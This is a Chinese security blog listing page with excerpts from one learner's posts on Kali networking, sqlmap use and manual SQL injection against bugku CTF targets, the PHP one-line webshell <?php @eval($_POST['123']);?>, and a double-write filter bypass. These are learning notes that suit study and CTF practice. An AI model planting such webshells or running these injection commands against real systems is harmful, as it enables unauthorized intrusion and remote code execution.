web安全
关注
分享
扫一扫
wxyccc
常清静矣
展开
-
kali linux 输入ifconfig后eth0只有ipv6的地址的解决方案
kali linux 输入ifconfig后eth0只有ipv6的地址的解决方案1、在虚拟网络编辑器上选择桥接模式,桥接的网卡别选自动,选择自己的网卡,具体可以在网络和适配器中查看2、在虚拟机设置中选择自己刚配置好的网络3、因为是校园网,所以我打开了浏览器后进入了上网登录页,输入账号密码登录成功,ifconfig一下ipv4的地址就出来了...原创 2021-10-29 10:11:09 · 4293 阅读 · 0 评论 -
sqlmap初体验
本来bugku的那道已经做出来了,但我还是想试试sqlmap到底该怎么使用:根据上篇文章的信息:我们首先用sqlmap查询数据库:sqlmap -u ‘url’ --data=’’ --current-db套入我们的数据sqlmap -u ‘http://114.67.246.176:17889’ --data=‘id=1’ --current-db查询出数据库名,然后再查出表名:sqlmap -u ‘http://114.67.246.176:17889’ --data=‘id=1’ -原创 2021-04-21 16:24:20 · 201 阅读 · 1 评论 -
bugku 成绩查询
最近刚好在了解sql注入的一些知识,然后刚好刷到了这题,记录一下我的思路吧~看到题目页面一个输入框就觉得是和sql注入有关的题目了,首先查看网页源代码:看到name=id,在火狐浏览器用maxhackerbar打开传递参数试试:成功查到了成绩单,并且切换1,2,3都可以成功,再判断是字符型注入还是数值型注入:id=1成功查询,id=1’查询失败,id=1’#查询成功,所以该注入类型为字符型注入。简单说明一下为什么:如果是数值型注入:where id =1 成功 where id=1’失败 w原创 2021-04-21 15:37:35 · 622 阅读 · 1 评论 -
对一句话木马的初步认识
在之前只停留在怎么使用一句话木马的层次上,但不懂原理总觉得不太踏实,今天稍微查询了一些资料,个人对一句话有了一些了解。我们分析一下最简单的一句话木马:<?php@eval($_POST['123']);?>(能理解一句话木马也得益于最近刚好了解了一下php语音)POST[]能够将浏览器的post请求储存在字典里,_POST[]能够将浏览器的post请求储存在字典里,POST[]能够将浏览器的post请求储存在字典里,_POST[‘123’]就是调用我们传给服务器关于‘123’的原创 2021-04-19 20:30:07 · 241 阅读 · 1 评论 -
双写绕过的原理
可以看到代码对key进行了过滤,那怎么办呢?可以构造kekeyy,当key被过滤掉时,剩下的字符自动拼接在一起,就形成了key,所以说:这样就可以拿下flag了原创 2021-04-18 15:52:47 · 2353 阅读 · 0 评论